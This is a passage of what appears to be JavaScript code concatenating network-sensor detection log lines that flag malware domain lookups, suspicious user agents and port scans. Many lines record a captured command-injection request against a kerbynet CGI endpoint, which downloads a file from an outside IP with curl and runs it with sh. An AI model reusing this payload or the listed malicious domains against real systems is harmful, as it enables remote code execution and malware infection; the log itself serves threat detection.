    '"2021-01-11 00:26:46.493661" r2d2 2.200.107.146 31367 37.209.192.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:26:46.530167" r2d2 2.200.110.233 63244 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 00:26:46.598904" r2d2 2.200.110.232 63733 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:26:46.628666" r2d2 2.200.110.233 64902 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:26:59.609272" r2d2 2.200.110.232 63960 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:26:59.611375" r2d2 2.200.107.146 43585 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:27:00.710102" r2d2 2.200.107.146 62607 198.51.45.67 53 UDP DNS (a9b21bea-username).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 00:26:56.919927" r2d2 10.1.56.50 56206 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:26:56.931106" r2d2 10.1.56.50 56206 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:27:19.132921" r2d2 10.1.19.42 58957 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:27:43.395363" r2d2 2.200.110.232 63779 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:27:43.400146" r2d2 2.200.107.146 7458 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:27:46.453928" r2d2 2.200.110.233 63646 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:27:51.631102" r2d2 2.200.110.232 49449 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:27:51.667260" r2d2 2.200.110.233 64265 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:28:04.685957" r2d2 2.200.110.233 63726 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:28:04.687957" r2d2 2.200.107.146 9335 54.197.149.214 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:28:13.195512" r2d2 10.3.160.42 22871 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:28:13.294482" r2d2 10.3.160.42 22871 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:28:13.396944" r2d2 10.3.160.42 22871 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:28:13.594001" r2d2 10.3.160.42 22871 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:28:13.893628" r2d2 10.3.160.42 22871 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:28:43.381565" r2d2 2.200.110.232 64434 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:28:42.894738" r2d2 2.200.106.65 60337 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:28:42.894742" r2d2 2.200.106.65 60337 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:28:42.942083" r2d2 2.200.106.65 60337 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:28:51.286831" r2d2 10.38.194.125 64595 10.1.194.234 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:28:51.287688" r2d2 2.200.110.233 56876 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:28:51.315378" r2d2 2.200.110.232 52693 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:28:44.653578" r2d2 2.200.106.65 60337 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:28:47.343758" r2d2 2.200.106.65 60337 2.23.97.208 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:28:56.684137" r2d2 2.200.110.232 49470 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:28:56.687638" r2d2 2.200.107.146 28496 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:28:56.725063" r2d2 2.200.110.233 64594 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:28:58.373683" r2d2 2.200.107.146 20408 137.116.213.59 53 UDP DNS (static.goool7).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:28:59.892277" r2d2 2.200.107.146 65159 137.116.213.59 53 UDP DNS (goool7).ws "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:29:01.602944" r2d2 2.200.110.232 65099 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:29:01.604812" r2d2 2.200.107.146 35986 192.54.112.30 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:29:01.649323" r2d2 2.200.110.233 64367 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 00:29:01.345948" r2d2 10.1.19.42 58958 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:03.105504" r2d2 178.17.174.14 48886 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:03.105511" r2d2 178.17.174.14 48886 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:03.105379" r2d2 178.17.174.14 48886 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:11.833531" r2d2 178.17.174.14 49216 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C; BRI/1; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:11.833534" r2d2 178.17.174.14 49216 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C; BRI/1; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:11.833522" r2d2 178.17.174.14 49216 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C; BRI/1; FunWebProducts; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:29:20.787854" r2d2 2.200.110.232 63617 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:29:59.611460" r2d2 2.200.110.232 63928 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:29:59.635318" r2d2 2.200.110.232 63796 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:29:59.643514" r2d2 178.17.174.14 51304 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Comcast Install 1.0; FunWebProducts; chromeframe/23.0.1271.97; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTbBCPA/5.13.1.18107; .NET4.0C; .NET4.0E; BRI/1; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:30:06.744005" r2d2 2.200.110.233 63690 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:30:08.160519" r2d2 10.1.19.42 58960 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:30:18.844621" r2d2 2.200.109.177 10810 8.8.8.8 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:30:20.698575" r2d2 2.200.109.177 10810 8.8.8.8 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:30:47.560138" r2d2 2.200.109.177 10810 8.8.8.8 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:30:58.802472" r2d2 10.1.81.47 63941 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:30:58.802460" r2d2 10.1.81.47 63941 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:30:58.802479" r2d2 10.1.81.47 63941 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:30:59.625606" r2d2 2.200.110.232 63450 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:31:09.666844" r2d2 2.200.107.146 32620 208.91.197.13 53 UDP IP "208.91.197.13 (lennonforjustice.com)" "parking site (suspicious)" (static)\n' +
    '"2021-01-11 00:31:10.421297" r2d2 2.200.107.146 57740 208.91.197.13 53 UDP IP "208.91.197.13 (lennonforjustice.com)" "parking site (suspicious)" (static)\n' +
    '"2021-01-11 00:31:10.627017" r2d2 2.200.107.169 53 2.200.106.65 53744 UDP DNS (lennonforjustice).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:16.486005" r2d2 2.200.110.233 63340 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:31:16.758473" r2d2 2.200.110.232 64499 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:31:16.766028" r2d2 2.200.107.146 64966 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:31:16.799940" r2d2 2.200.110.233 63435 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:31:43.384558" r2d2 2.200.110.232 64690 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:31:46.595588" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:46.595587" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:46.595577" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:46.874608" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:46.874744" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:46.874742" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:48.547638" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:48.547644" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:48.547642" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:50.779508" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:50.779585" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:55.243728" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:55.243647" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:55.243730" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:31:47.540555" r2d2 178.17.174.14 60616 2.200.109.24 80 TCP UA "Vega (Mozilla/5.0 \\(Linux; Android 4.2.2; Vega Build/JDQ39\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/53.0.2785.124 Mobile Safari/537.36)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:04.218916" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:04.218904" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:04.218919" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:13.574858" r2d2 10.3.160.42 22873 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:32:13.674073" r2d2 10.3.160.42 22873 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:32:13.776167" r2d2 10.3.160.42 22873 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:32:13.973371" r2d2 10.3.160.42 22873 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:32:14.673266" r2d2 10.3.160.42 22873 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:32:15.176220" r2d2 10.3.160.42 22873 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:32:22.028033" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:22.028032" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:22.028027" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:26.800802" r2d2 2.200.110.232 63483 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:32:26.843748" r2d2 2.200.110.233 65093 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:32:43.384383" r2d2 2.200.110.232 65366 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:32:42.597109" r2d2 178.17.174.14 36054 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.0.30618; .NET CLR 3.5.30729; MDDC; .NET4.0C; .NET4.0E; FunWebProducts; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:42.597104" r2d2 178.17.174.14 36054 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.0.30618; .NET CLR 3.5.30729; MDDC; .NET4.0C; .NET4.0E; FunWebProducts; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:42.597107" r2d2 178.17.174.14 36054 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.21022; .NET CLR 3.0.30618; .NET CLR 3.5.30729; MDDC; .NET4.0C; .NET4.0E; FunWebProducts; BRI/2\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:57.740170" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:57.740169" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:57.740162" r2d2 84.110.106.22 48354 2.200.104.185 80 TCP URL 2.200.104.185(/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*%22;cd%20%2ftmp;curl%20-o%20http%3a%2f%2f5.206.227.228%2fzero;sh%20zero;%22) "potential remote code execution (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:32:59.611666" r2d2 2.200.110.232 65404 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:32:59.621401" r2d2 2.200.107.146 38960 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:32:59.795913" r2d2 10.44.70.211 51274 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:33:00.470833" r2d2 2.200.110.232 64176 2.200.107.168 53 UDP DNS (td-username-db4-63-185).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 00:33:00.476677" r2d2 2.200.107.146 1109 198.51.45.3 53 UDP DNS (td-username-db4-63-185).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 00:33:06.098059" r2d2 2.200.110.233 49190 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:33:32.001060" r2d2 2.200.108.59 20026,20028,20031,20032,20033,20034,20035,20036,20038,20042,20044,20047,33160,33180,33534,33644,33648,33774,33952,34172,35204,36270,36760,37000,37230,37642,37644,37645,37988,38962,39226,39410,40124,40344,40434,40884,40934,42278,43266,43268,43706,43824,43918,44012,44014,44015,44016,44030,44184,44680,44918,44976,45110,45426,45586,45654,47238,47562,47620,48032,48336,48888,49102,49754,49982,50040,50152,50946,51182,51724,52060,52254,52630,52726,52996,53230,53326,53348,53426,53716,53816,53858,54338,54460,55148,55200,55276,55320,56506,56578,56750,56970,57168,57256,58520,58992,59386,60566,60748 77.53.81.105 21,5121,5689,6630,8359,10556,10906,11671,12622,13801,14036,14200,14769,18366,20063,20332,20373,20659,20821,21285,21816,21865,22732,23104,24273,26600,26668,27358,27619,29408,29953,30777,32012,33567,33690,33900,35398,36723,36908,37768,37937,39887,39903,43059,43568,44205,44374,45411,46594,47729,49013,49061,49145,49315,50430,50677,50740,50946,51046,51882,52055,52701,52810,55053,55900,56130,57543,58348,58675,58744,58919,59389,60073,60140,60416,60935,61437,63032,64261,64638,65083 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:33:32.001053" r2d2 2.200.108.59 20025,20028,20036,20037,20039,20040,20041,20045,32772,33648,33774,35094,35204,35330,35400,35450,35578,35748,36270,36340,36802,37230,37641,37642,37643,38962,39308,40124,40934,41088,42278,42808,43324,43706,44011,44012,44030,44680,44976,45048,45426,46792,47562,48030,48164,48336,48658,48888,49982,50122,50658,51142,51202,51378,51742,52510,52954,52996,53060,53316,53348,53816,53830,54338,54460,54790,55158,55276,55820,56970,57022,57168,58036,58518,58520,59016,59022,59140,59418,59538,60722 77.53.81.105 21,5121,5420,8358,8578,10718,10906,11466,11998,12854,13666,14769,20373,20442,20528,20724,20821,21472,21816,22983,23482,24273,24639,26668,27619,28240,28466,29394,29506,29953,30019,30934,33567,33690,34026,37768,38801,39887,40918,41806,42234,44205,45330,46594,47450,48005,49013,49315,50430,50677,50740,50887,52099,55053,55819,55900,56832,57022,57776,58321,58748,58919,59272,60416,60885,63891,64090,64638,65083 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:33:36.841634" r2d2 2.200.110.232 64027 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:33:36.871993" r2d2 2.200.110.233 65127 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:33:32.001059" r2d2 2.200.108.59 20024,20025,20026,20027,20029,20031,20033,20034,20039,20041,20042,20043,20044,20046,20047,33160,33386,33534,33800,34030,34090,35220,35548,35914,36340,36646,36992,37639,37640,37644,37988,38244,38508,40344,42808,43268,43312,43324,43824,43918,44013,44015,44918,45048,45060,45110,45122,45654,45984,47214,47398,47478,47620,47852,48270,49754,50152,50658,50946,50952,51142,51538,51742,51946,52060,52254,52494,52510,52834,52862,52954,53230,53316,53318,53326,53426,54240,54790,55148,55158,55200,56598,57022,57256,58036,58518,58992,59022,59386,59418,60722 77.53.81.105 21,5689,5695,6630,6707,8012,8359,8578,10718,11466,11998,12854,18029,18943,19682,20332,20410,20659,21285,22128,22732,23482,23508,24600,24639,25021,25086,26213,26600,27358,28240,28306,28466,28721,29394,31812,33900,34026,35398,36723,36908,38642,39903,40918,43059,43568,44556,46083,47729,50131,50946,52055,52099,52701,55819,56526,56769,56832,57022,57338,57543,57825,58347,58748,59389,60073,60487,60556,60609,60885,60935,61816 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:33:59.622207" r2d2 2.200.110.232 64494 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:34:00.715424" r2d2 2.200.110.232 65420 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:34:00.767117" r2d2 2.200.110.233 64422 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:34:14.092014" r2d2 10.1.19.42 58963 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:34:15.813115" r2d2 10.3.160.42 14670 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
